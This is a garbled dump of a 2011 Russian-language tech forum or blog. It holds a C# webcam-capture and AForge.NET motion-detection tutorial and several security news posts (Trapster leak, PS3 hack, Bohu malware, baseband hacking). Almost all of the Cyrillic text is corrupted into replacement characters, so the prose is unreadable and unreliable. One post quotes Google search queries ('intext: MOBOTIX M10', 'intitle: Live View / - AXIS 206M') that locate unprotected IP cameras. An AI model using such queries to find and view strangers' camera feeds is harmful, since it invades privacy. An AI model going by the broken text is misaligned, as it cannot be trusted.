private const int WM_CAP_GRAB_FRAME = 0x43c;

//��

private const int WM_CAP_SAVEDIB = 0x419;

�� -�� . �� , � �� . ��, �� .

�� (��, ��) �� : GetAllDevices (�� ), GetDevice (�� ), ShowWindow (�� -��), GetFrame (�� ) � GetCapture (�� ).

� �� . �� ComboBox (�� ) � �� "��", "��", "��" � "��". �� , �� Image. �� .

�� "��". �� . �� :

Device[] devices = DeviceManager.GetAllDevices();

foreach (Device d in devices)

{

cmbDevices.Items.Add(d);

}

��, �� ? �� -�� . �� :

Device selectedDevice = DeviceManager.GetDevice(cmbDevices.SelectedIndex);

selectedDevice.ShowWindow(this.picCapture);

�� , �� . �� "��":

Device selectedDevice = DeviceManager.GetDevice(cmbDevices.SelectedIndex);

selectedDevice.FrameGrabber();

� �� FrameGrabber(). � �� . ��, �� , �� .
�� 3

�� , �� , �� . �� : �� . �� (��) �� , �� . �� , �� .NET � AForge.NET.

AForge.NET � �� . � �� , �� : ��, �� (�� , �� , �� , �� , �� ), ��, ��, �� .�. � �� . � �� . �� . �� . �� .

�� . �� , �� . "�� WinAPI ��?" � �� . � �� , �� . �� , �� . ��-�� .NET, � ��-�� WinAPI.

�� . �� MotionDetector �� . �� Bitmap � �� . � �� :

MotionDetector detector = new MotionDetector(

new TwoFramesDifferenceDetector( ),

new MotionAreaHighlighting( ) );

//��

if ( detector != null )

{

float motionLevel = detector.ProcessFrame( image );

if ( motionLevel > motionAlarmLevel )

{

flash = (int) ( 2 * ( 1000 / alarmTimer.Interval ) );

}

if ( detector.MotionProcessingAlgorithm is BlobCountingObjectsProcessing )

{

BlobCountingObjectsProcessing countingDetector = (BlobCountingObjectsProcessing)
detector.MotionProcessingAlgorithm;

objectsCountLabel.Text = "Objects: " + countingDetector.ObjectsCount.ToString(
);

}

else

{

objectsCountLabel.Text = "";

}

�� (�� MotionDetector) � �� -��. �� , � �� (�� ProcessFrame): �� motionlevel �� motionLevelAlarm (0.015f), �� , �� ! �� . �� .
�� 4

��-�� -�� ? �� , �� , �� , �� ! � �� http://codeplex.com (�� OpenSource �� MS) �� (� �� ), �� -��. �� .NET � SilverLight. �� , �� . �� (�� , �� , �� , �� .�.) � �� SilverLight � �� . �� , must use! �� .
��

�� . �� -��, � �� -��.

�� Skype-��. � �� , �� . �� . �� , �� -�� , �� , �� , �� "�� "� �� :). �� , � �� .

Gauss gun � �� #1

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:24:17 +0300

�� ? � �� ? ��?! � �� :) �� , ��, �� -�� , �� , � �� . �� -�� , �� .

�� , �� . �� , �� , � �� - �� ? �� . � �� :) � �� (��) - �� , �� , �� (�� ) ��, �� . �� , ��, �� . � �� , �� , �� .

�� -��, �� , �� . �� . �� !

�� , �� . �� , �� . �� , � �� , �� , �� :) �� , ��, � �� 200-�� . �� , �� , � �� , �� , �� .

��, �� , �� , �� , � �� . � �� , �� , �� , � �� , �� . � �� , �� , � �� :)

�� . ��, �� , �� , �� . �� , �� : � �� , ��, �� ?

�� :

(�� .)

�� : Rail gun � Gauss gun. �� - ��, �� , �� . � �� (�� ! 8]) � �� . �� . (�� ! :])

�� (�� , �?!). �� "��" �� 20-�� , ��, �� (10000 �� = 1 ��). �� "��" �� . �� . � ��, ��, �� , �.�. �� , ��, �� .

�� , �� (��), �� , �� (� �� ) ��. �� , � �� , �� .

�� (�� ? :]), �� : �� . �� , �� , �� , �� , �� . �� , �� , �� . � �� , � �� . �� , �� , �� , ��, �� (�� ), �� -�� , � �� . �� , �� . � �� , �� .

�� , �� . �� , � �� , �� (�� , �� 8]) - �� . �� , � �� , �� .

� �� , �� : �� .

�� (�� ), �� , � �� . �� (��) �� (�� : �� ). �� , �� . � �� , �� , �� , �� . �� , � �� , �� , �� , �� .

�� (�� ) �� 3%. �� 1-�� , �.�. �� (��) �� . �� 99% �� , �� , �� , �� , ��, �� (��, ��, ��) � �� (��/�� , ��, �� ), �� .

��, �� 100 ��, �� 1 ��.
�� [X], �� .

�� 10 ��

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:20:31 +0300

��, �� , �� 10 �� , �� email-�� , �� .

�� Trapster, �� 10 �� . �� (�� ) �� , �� .

Trapster ��, �� "��", � �� "�� , � �� , �� ".

�� Trapster �� , �� Gawker Media � �� 1.5 �� email-��. �� , �� , �� , �� , �� Twitter, Facebook � �� -�� , �� , �� , �� .

�� Twitter �� Trapster � �� .

��

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:18:08 +0300

�� , �� . �� : � ��, �� , � �� . �� . �� , � �� . �� , �� , � �� .

�� , �� . �� . � �� IP ��, �� .

�� Ars technica, �� , �� IP ��, �� . �� . �� .

�� , �� , �� . �� , � �� , � �� IP ��, �� IP ��, �� , � �� -�� , �� Google.

"�� IP �� , �� , �� IP ��, � �� (NVR)", - �� . �� , �� (�� Flash, Java, �� ActiveX), �� , �� .

�� , �� "intitle", "inurl", "intext" � ��., �� . �� , �� "intext: MOBOTIX M10", "intext: Open Menu" � "intitle: Live View / - AXIS 206M" �� .

�� . �� . �� . �� , �� , ��, �� , �� , �� .

� �� . �� , �� . � �� , �� .

�� , �� . � �� , �� . � �� , �� -�� . �� , �� ?

� �� , � �� , �� . �� DVR �� NVR �� , �� , �� , �� . ��, �� .

Sony �� PlayStation 3

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:17:21 +0300

Sony �� , �� PlayStation 3 �� . �� -�� Sony, �� fail0verflow �� Chaos Communication Congress � �� .

�� Sony �� , �� , �� .

�� fail0verflow �� -��. �� Sony. �� , �� Linux � �� , � �� .

�� (�� geohot) - �� , �� -�� Sony, �� . �� , �� , �� iPhone, �� .

�� Linux �� , �� , �� Sony �� . Sony �� fail0verflow, � geohot��.

��-�� , ��, �� , �� .

��, 21 ��, �� BBC, �� Sony �� . "� �� , ��, �� Sony �� ", - �� .

�� fail0verflow �� "Sony �� " �� , �� .

"�� , �� , �� ", - �� . "�� . �� Sony �� , �� Sony".

�� , �� Sony �� .

�� Sony �� . �� , � Sony �� PS3 �� . �� GFI Security Chris Boyd, �� , ��, �� , �� .

"�� , �� , �� ".

"�� , Sony �� blu-ray ��, �� , �� 50 �� , �� . � �� , Sony �� , �� -�� ".

��

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:16:12 +0300

�� , �� "��" �� .

�� Bohu �� Windows � �� , �� . �� malware �� . �� "��" ��, �� - �� (�� , � �� ) � �� . Bohu �� , �� "�� " �� , �� .

Bohu, �� , �� Microsoft � ��, ��, �� Kingsoft, Qihoo � Rising. �� .

�� -��, �� . � �� Bohu �� , �� . �� .

�� Microsoft �� Bohu, �� "�� , �� " � �� Microsoft Malware Protection Center.

�� , ��-�� Lumension, ��, �� , �� Bohu, �� , �� , �� .

"Bohu � �� ", - �� . "�� , �� , �� . �� , �� , � �� ".

"�� , �� . �� , �� ".

��

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:15:31 +0300

�� -�� , �� .

Nevada Gaming Control Board (�� ) �� , �� , �� . "�� ", - �� .

�� , �� ; �� - �� - �� , ��, ��, � �� .

�� , ��, � �� .

"�� , �� , �� , � �� . �� , � �� , �� , ��, ��, �� .�� , �� , �� ", - �� .

�� , �� , �� , �� , �� . �� , �� .

Microsoft �� WP7

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:14:42 +0300

�� Microsoft �� -��, �� Windows Phone 7. �� -�� Seattle Post-Intelligencer.

��, �� "��" ��-�� . �� Microsoft ��, �� , �� -��.

�� , �� Microsoft �� . � ��, �� , �� 50 �� . �� , �� Wi-Fi.

�� Microsoft, �� Windows Phone 7. �� Microsoft ��, �� 1,5 �� .

Baseband Hacking: ��

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:05:42 +0300

�� -�� , �� , �� , �� Qualcomm � Infineon Technologies. �� , �� iPhone, �� Android, �� Black Hat � ��.

�� , �� , �� , �� .
�� Baseband-��

� �� IDG News Service � LinuxInsider, �� . �� , �� , �� -��. � �� . �� , �� OpenBTS, �� $2 000, �� . �� , �� (�� , �� - �� ) � �� . �� , �� 3G MicroCell �� AT&T, �� ; �� AT&T �� $150.

�� , �� , �� . �� , �� GSM/3GPP �� baseband-�� . �� , �� , �� GSM Association � European Telecommunications Standards Institute (�� ) �� .
�� ?

� �� -�� , �� , �� , �� , �� IDG.

�� , �� , �� , �� . � ��, ��, �� -�� Defcon � ��-��, �� . �� , �� .

�� , �� -�� .

�� baseband hacking, �� , �� .

�� Sophos �� , "�� -�� , �� , �� , �� ", - �� . "� �� , �� -�� , �� ".

��

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 11:24:08 +0300

�� !

Budonlaine

�� � ������ ���������

������ ���� no-steam css-������

����� ���������. ������ 40 ����� ������������� �������� � ��������.

��� �� ��������� �� ������ �������������� �����?

����� �����-�������: ����� #1

��� ����� � ������: ����� ��������� ����������� �����

������� PE-����� �1

����� ���� (user manual): #1

��������� �������������� ������: ������ �� ������

������������ ����� ���-������: ������ ������������ ���������� ���-����

Gauss gun � �������� �������� #1

���� � 10 ���������� ������������� ������������� � ����� �������

������������ ������ ������� ���������

Sony ������ � ��� �� ���������� PlayStation 3

��������� ����� ��������� �������� ������� ������ ������������

������ �������� ������ �� ������ ��� ������ ������

Microsoft �������� ������� ����������� ������� WP7

Baseband Hacking: ����� ��� ������ ����������

�������� ���������

��

�� no-steam css-��

�� . �� 40 �� .

�� ?

�� -��: �� #1

�� : ��

�� PE-�� 1

�� (user manual): #1

�� : ��

�� -��: �� -��

Gauss gun � �� #1

�� 10 ��

��

Sony �� PlayStation 3

��

��

Microsoft �� WP7

Baseband Hacking: ��

��